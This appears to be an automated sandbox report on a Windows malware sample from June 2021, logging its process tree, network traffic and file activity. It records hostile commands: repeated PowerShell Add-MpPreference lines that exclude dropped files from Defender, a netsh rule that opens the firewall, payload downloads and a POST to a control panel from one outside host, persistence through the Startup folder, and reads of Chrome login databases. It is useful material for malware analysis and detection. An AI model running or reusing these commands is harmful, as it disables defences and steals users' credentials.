Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6402 | June 21, 2021, 12:56 p.m. | June 21, 2021, 12:59 p.m. |
-
-
AdvancedRun.exe "C:\Users\test22\AppData\Local\Temp\b4e0ccc1-38c6-4956-8f3c-173d66156970\AdvancedRun.exe" /EXEFilename "C:\Users\test22\AppData\Local\Temp\b4e0ccc1-38c6-4956-8f3c-173d66156970\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
6928 -
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Local\Temp\File.exe" -Force
3916 -
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Local\Temp\File.exe" -Force
7552 -
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fdb1n217b2a716347aYpy7b42e8M8jdfM23.exe" -Force
7076 -
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fdb1n217b2a716347aYpy7b42e8M8jdfM23.exe" -Force
5860 -
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Local\Temp\File.exe" -Force
4104 -
fdb1n217b2a716347aYpy7b42e8M8jdfM23.exe "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fdb1n217b2a716347aYpy7b42e8M8jdfM23.exe"
2224-
AdvancedRun.exe "C:\Users\test22\AppData\Local\Temp\b48c2de5-ab39-4bbf-8b57-fce6a08fd355\AdvancedRun.exe" /EXEFilename "C:\Users\test22\AppData\Local\Temp\b48c2de5-ab39-4bbf-8b57-fce6a08fd355\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
3284 -
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fdb1n217b2a716347aYpy7b42e8M8jdfM23.exe" -Force
2132 -
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fdb1n217b2a716347aYpy7b42e8M8jdfM23.exe" -Force
7396 -
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Resources\Themes\0N33brp1ee73eay28fbr2Mmce11G8172SP2d9n\svchost.exe" -Force
4568 -
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fdb1n217b2a716347aYpy7b42e8M8jdfM23.exe" -Force
5236 -
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Resources\Themes\0N33brp1ee73eay28fbr2Mmce11G8172SP2d9n\svchost.exe" -Force
8132 -
-
timeout.exe timeout 1
4680
-
-
fdb1n217b2a716347aYpy7b42e8M8jdfM23.exe "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fdb1n217b2a716347aYpy7b42e8M8jdfM23.exe"
8508-
fdb1n217b2a716347aYpy7b42e8M8jdfM23.exe "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fdb1n217b2a716347aYpy7b42e8M8jdfM23.exe"
5808-
svchost.exe C:\Windows\syswow64\svchost.exe
6852
-
-
-
-
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Resources\Themes\0N33brp1ee73eay28fbr2Mmce11G8172SP2d9n\svchost.exe" -Force
6956 -
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Local\Temp\File.exe" -Force
8920 -
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Resources\Themes\0N33brp1ee73eay28fbr2Mmce11G8172SP2d9n\svchost.exe" -Force
6848 -
-
timeout.exe timeout 1
6104
-
-
-
-
svchost.exe C:\Windows\syswow64\svchost.exe
6664 -
-
AdvancedRun.exe "C:\Users\test22\AppData\Local\Temp\d6ed91e2-9539-4857-ade5-1c576ad9fc14\AdvancedRun.exe" /EXEFilename "C:\Users\test22\AppData\Local\Temp\d6ed91e2-9539-4857-ade5-1c576ad9fc14\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
5496 -
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\ULWTCCYCJS.exe" -Force
3148 -
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\ULWTCCYCJS.exe" -Force
236 -
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\t14b8IM7c0bA4XfaOfnc1hcOur946lf69o15K4.exe" -Force
3244 -
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\t14b8IM7c0bA4XfaOfnc1hcOur946lf69o15K4.exe" -Force
2696 -
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\ULWTCCYCJS.exe" -Force
3868 -
t14b8IM7c0bA4XfaOfnc1hcOur946lf69o15K4.exe "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\t14b8IM7c0bA4XfaOfnc1hcOur946lf69o15K4.exe"
2980 -
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Resources\Themes\aero\Shell\5ev6d0b9739921ve54Sd\svchost.exe" -Force
6288 -
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\ULWTCCYCJS.exe" -Force
2320 -
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Resources\Themes\aero\Shell\5ev6d0b9739921ve54Sd\svchost.exe" -Force
784 -
-
timeout.exe timeout 1
7544
-
-
-
Host.exe "C:\Users\test22\AppData\Roaming\Install\Host.exe" -m "C:\Users\test22\AppData\Roaming\ULWTCCYCJS.exe"
1828-
AdvancedRun.exe "C:\Users\test22\AppData\Local\Temp\bec864d5-56b2-4bb0-ac52-b85efc87c7a8\AdvancedRun.exe" /EXEFilename "C:\Users\test22\AppData\Local\Temp\bec864d5-56b2-4bb0-ac52-b85efc87c7a8\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
2324 -
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\Install\Host.exe" -Force
5940 -
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\Install\Host.exe" -Force
5812 -
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Resources\Themes\aero\Shell\5ev6d0b9739921ve54Sd\svchost.exe" -Force
1396 -
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\Install\Host.exe" -Force
7540 -
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Resources\Themes\aero\Shell\5ev6d0b9739921ve54Sd\svchost.exe" -Force
4080 -
-
timeout.exe timeout 1
7812
-
-
Host.exe "C:\Users\test22\AppData\Roaming\Install\Host.exe"
6452
-
-
-
-
File.exe C:\Users\test22\AppData\Local\Temp\File.exe /stext C:\Users\test22\AppData\Roaming\EWLTMYXOWI
1132 -
File.exe C:\Users\test22\AppData\Local\Temp\File.exe -f C:\Users\test22\AppData\Roaming\LOMWYOHPXP
8384 -
-
AdvancedRun.exe "C:\Users\test22\AppData\Local\Temp\287ef45a-794f-4764-8158-ab3eb3b7f82e\AdvancedRun.exe" /EXEFilename "C:\Users\test22\AppData\Local\Temp\287ef45a-794f-4764-8158-ab3eb3b7f82e\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
6116 -
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\SHSPFVNKVD.exe" -Force
2408 -
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\SHSPFVNKVD.exe" -Force
6684 -
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\57w10427ebbdUHA4f4f4J20y9.exe" -Force
7524 -
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\57w10427ebbdUHA4f4f4J20y9.exe" -Force
6584 -
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\SHSPFVNKVD.exe" -Force
2540 -
57w10427ebbdUHA4f4f4J20y9.exe "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\57w10427ebbdUHA4f4f4J20y9.exe"
4376-
AdvancedRun.exe "C:\Users\test22\AppData\Local\Temp\a3bf0341-c294-4ec7-b6b5-41447877872f\AdvancedRun.exe" /EXEFilename "C:\Users\test22\AppData\Local\Temp\a3bf0341-c294-4ec7-b6b5-41447877872f\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
1276 -
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\57w10427ebbdUHA4f4f4J20y9.exe" -Force
6548 -
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\57w10427ebbdUHA4f4f4J20y9.exe" -Force
4832 -
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files\Common Files\System\kc7e6re8cC19dqS5Lbcj3d84cZRHu4kfX8G77aBt\svchost.exe" -Force
5856 -
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\57w10427ebbdUHA4f4f4J20y9.exe" -Force
6208 -
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files\Common Files\System\kc7e6re8cC19dqS5Lbcj3d84cZRHu4kfX8G77aBt\svchost.exe" -Force
3940 -
-
timeout.exe timeout 1
5064
-
-
57w10427ebbdUHA4f4f4J20y9.exe "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\57w10427ebbdUHA4f4f4J20y9.exe"
1048
-
-
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files\Common Files\System\kc7e6re8cC19dqS5Lbcj3d84cZRHu4kfX8G77aBt\svchost.exe" -Force
5452 -
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\SHSPFVNKVD.exe" -Force
1912 -
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files\Common Files\System\kc7e6re8cC19dqS5Lbcj3d84cZRHu4kfX8G77aBt\svchost.exe" -Force
8844 -
-
timeout.exe timeout 1
2608
-
-
-
-
AdvancedRun.exe "C:\Users\test22\AppData\Local\Temp\c0653c9e-ffa5-44ca-b9d2-e0edc675594a\AdvancedRun.exe" /EXEFilename "C:\Users\test22\AppData\Local\Temp\c0653c9e-ffa5-44ca-b9d2-e0edc675594a\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
4920 -
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\ProgramData\svchost.exe" -Force
860 -
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\ProgramData\svchost.exe" -Force
6044 -
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files\Common Files\System\kc7e6re8cC19dqS5Lbcj3d84cZRHu4kfX8G77aBt\svchost.exe" -Force
5772 -
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\ProgramData\svchost.exe" -Force
7156 -
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files\Common Files\System\kc7e6re8cC19dqS5Lbcj3d84cZRHu4kfX8G77aBt\svchost.exe" -Force
2356 -
-
timeout.exe timeout 1
7256
-
-
-
netsh.exe netsh firewall add allowedprogram "C:\ProgramData\svchost.exe" "svchost.exe" ENABLE
6384
-
-
-
-
-
File.exe C:\Users\test22\AppData\Local\Temp\File.exe -f C:\Users\test22\AppData\Roaming\BIDXMHYHNV
4408 -
File.exe C:\Users\test22\AppData\Local\Temp\File.exe -f C:\Users\test22\AppData\Roaming\UOOKFMESAY
532
-
-
-
Name | Response | Post-Analysis Lookup |
---|---|---|
ni2748194-1.web16.nitrado.hosting |
CNAME
vweb16.nitrado.hosting
|
194.169.211.111 |
apdocroto.gq | 104.21.14.60 | |
dontreachme.duckdns.org | 46.102.106.151 | |
dontreachme3.ddns.net | 95.90.186.169 |
Suricata Alerts
Suricata TLS
No Suricata TLS
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\DigitalProductId |
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\14.0\Registration\{191301D3-A579-428C-B0C7-D7988500F9E3}\DigitalProductID |
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\14.0\Registration\{6F327760-8C5C-417C-9B61-836A98287E0C}\DigitalProductID |
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\14.0\Registration\{FDF3ECB9-B56F-43B2-A9B8-1B48B6BAE1A7}\DigitalProductID |
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Office\12.0\Registration\{90120000-0030-0000-0000-0000000FF1CE}\DigitalProductID |
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Registration\DigitalProductId |
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\14.0\Registration\{90140000-0011-0000-1000-0000000FF1CE}\DigitalProductID |
registry | HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate |
suspicious_features | GET method with no useragent header | suspicious_request | GET http://apdocroto.gq/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-08D4450EE4EB09C734C93A8E8E91A909.html | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET http://apdocroto.gq/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-59CA53825A30DDA8641228CFB3A1898A.html | ||||||
suspicious_features | POST method with no referer header, Connection to IP address | suspicious_request | POST http://46.102.106.151/panel/index.php | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET http://apdocroto.gq/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-C311B505088D4AC5F97AC7A0C3EA6538.html | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET http://apdocroto.gq/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-C1900454F8C1F17DAFA268D4AC67120F.html | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET http://apdocroto.gq/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-B8A00046C7A941058E012A87473EB342.html | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET http://apdocroto.gq/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-153E31DBDD1ACDF382491ECDBE37689C.html |
domain | dontreachme3.ddns.net |
domain | dontreachme.duckdns.org |
request | GET http://apdocroto.gq/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-08D4450EE4EB09C734C93A8E8E91A909.html |
request | GET http://apdocroto.gq/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-59CA53825A30DDA8641228CFB3A1898A.html |
request | POST http://46.102.106.151/panel/index.php |
request | GET http://ni2748194-1.web16.nitrado.hosting/HostStartups.exe |
request | GET http://apdocroto.gq/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-C311B505088D4AC5F97AC7A0C3EA6538.html |
request | GET http://apdocroto.gq/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-C1900454F8C1F17DAFA268D4AC67120F.html |
request | GET http://ni2748194-1.web16.nitrado.hosting/Server.exe |
request | GET http://apdocroto.gq/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-B8A00046C7A941058E012A87473EB342.html |
request | GET http://apdocroto.gq/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-153E31DBDD1ACDF382491ECDBE37689C.html |
request | POST http://46.102.106.151/panel/index.php |
description | File.exe tried to sleep 357 seconds, actually delayed analysis time by 357 seconds |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Web Data |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\WidevineCdm\Web Data |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\ThirdPartyModuleList64\Web Data |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\GrShaderCache\Web Data |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\TLSDeprecationConfig\Login Data |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Web Data-journal |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\Login Data |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\recovery\Login Data |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crowd Deny\Web Data |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data-wal |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Floc\Login Data |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\PepperFlash\Web Data |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\FileTypePolicies\Login Data |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\ZxcvbnData\Web Data |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\OriginTrials\Web Data |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Floc\Web Data |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\OriginTrials\Login Data |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\RecoveryImproved\Login Data |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Web Data-wal |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateTransparency\Web Data |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\recovery\Web Data |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\TLSDeprecationConfig\Web Data |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateTransparency\Login Data |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\ZxcvbnData\Login Data |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad\Login Data |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\OnDeviceHeadSuggestModel\Web Data |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\PnaclTranslationCache\Web Data |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\GrShaderCache\Login Data |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\Login Data |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\RecoveryImproved\Web Data |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\Web Data |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\FileTypePolicies\Web Data |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\FontLookupTableCache\Web Data |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateRevocation\Web Data |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\pnacl\Web Data |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\pnacl\Login Data |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Subresource Filter\Web Data |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\OnDeviceHeadSuggestModel\Login Data |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\SSLErrorAssistant\Login Data |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\SSLErrorAssistant\Web Data |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateRevocation\Login Data |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\ThirdPartyModuleList64\Login Data |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Subresource Filter\Login Data |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad\Web Data |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\SwReporter\Web Data |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing\Login Data |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\PnaclTranslationCache\Login Data |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\SafetyTips\Login Data |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal |
file | C:\Users\test22\AppData\Local\Temp\b48c2de5-ab39-4bbf-8b57-fce6a08fd355\test.bat |
file | C:\Users\test22\AppData\Local\Temp\bec864d5-56b2-4bb0-ac52-b85efc87c7a8\test.bat |
file | C:\Users\test22\AppData\Local\Temp\a3bf0341-c294-4ec7-b6b5-41447877872f\test.bat |
file | C:\Users\test22\AppData\Local\Temp\287ef45a-794f-4764-8158-ab3eb3b7f82e\AdvancedRun.exe |
file | C:\Users\test22\AppData\Roaming\ULWTCCYCJS.exe |
file | C:\Users\test22\AppData\Local\Temp\287ef45a-794f-4764-8158-ab3eb3b7f82e\test.bat |
file | C:\Users\test22\AppData\Local\Temp\b4e0ccc1-38c6-4956-8f3c-173d66156970\test.bat |
file | C:\Users\test22\AppData\Local\Temp\bec864d5-56b2-4bb0-ac52-b85efc87c7a8\AdvancedRun.exe |
file | C:\Users\test22\AppData\Local\Temp\d6ed91e2-9539-4857-ade5-1c576ad9fc14\AdvancedRun.exe |
file | C:\Users\test22\AppData\Roaming\Install\Host.exe |
file | C:\Users\test22\AppData\Local\Temp\d6ed91e2-9539-4857-ade5-1c576ad9fc14\test.bat |
file | C:\Users\test22\AppData\Local\Temp\c0653c9e-ffa5-44ca-b9d2-e0edc675594a\AdvancedRun.exe |
file | C:\Users\test22\AppData\Roaming\SHSPFVNKVD.exe |
file | C:\Users\test22\AppData\Local\Temp\b4e0ccc1-38c6-4956-8f3c-173d66156970\AdvancedRun.exe |
file | C:\Users\test22\AppData\Local\Temp\b48c2de5-ab39-4bbf-8b57-fce6a08fd355\AdvancedRun.exe |
file | C:\Users\test22\AppData\Local\Temp\a3bf0341-c294-4ec7-b6b5-41447877872f\AdvancedRun.exe |
file | C:\Users\test22\AppData\Local\Temp\c0653c9e-ffa5-44ca-b9d2-e0edc675594a\test.bat |
file | C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk |
cmdline | powershell Add-MpPreference -ExclusionPath "C:\Program Files\Common Files\System\kc7e6re8cC19dqS5Lbcj3d84cZRHu4kfX8G77aBt\svchost.exe" -Force |
cmdline | powershell Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\ULWTCCYCJS.exe" -Force |
cmdline | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\57w10427ebbdUHA4f4f4J20y9.exe" -Force |
cmdline | powershell Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\Install\Host.exe" -Force |
cmdline | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Local\Temp\File.exe" -Force |
cmdline | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Resources\Themes\aero\Shell\5ev6d0b9739921ve54Sd\svchost.exe" -Force |
cmdline | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files\Common Files\System\kc7e6re8cC19dqS5Lbcj3d84cZRHu4kfX8G77aBt\svchost.exe" -Force |
cmdline | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\ProgramData\svchost.exe" -Force |
cmdline | powershell Add-MpPreference -ExclusionPath "C:\Windows\Resources\Themes\aero\Shell\5ev6d0b9739921ve54Sd\svchost.exe" -Force |
cmdline | powershell Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fdb1n217b2a716347aYpy7b42e8M8jdfM23.exe" -Force |
cmdline | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\Install\Host.exe" -Force |
cmdline | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fdb1n217b2a716347aYpy7b42e8M8jdfM23.exe" -Force |
cmdline | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\SHSPFVNKVD.exe" -Force |
cmdline | netsh firewall add allowedprogram "C:\ProgramData\svchost.exe" "svchost.exe" ENABLE |
cmdline | powershell Add-MpPreference -ExclusionPath "C:\Windows\Resources\Themes\0N33brp1ee73eay28fbr2Mmce11G8172SP2d9n\svchost.exe" -Force |
cmdline | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Resources\Themes\0N33brp1ee73eay28fbr2Mmce11G8172SP2d9n\svchost.exe" -Force |
cmdline | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\t14b8IM7c0bA4XfaOfnc1hcOur946lf69o15K4.exe" -Force |
cmdline | powershell Add-MpPreference -ExclusionPath "C:\ProgramData\svchost.exe" -Force |
cmdline | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\ULWTCCYCJS.exe" -Force |
cmdline | C:\Windows\syswow64\svchost.exe |
cmdline | powershell Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\t14b8IM7c0bA4XfaOfnc1hcOur946lf69o15K4.exe" -Force |
cmdline | cmd.exe /c timeout 1 |
cmdline | "C:\Windows\System32\cmd.exe" /c timeout 1 |
cmdline | "C:\ProgramData\svchost.exe" |
cmdline | powershell Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\57w10427ebbdUHA4f4f4J20y9.exe" -Force |
cmdline | powershell Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Local\Temp\File.exe" -Force |
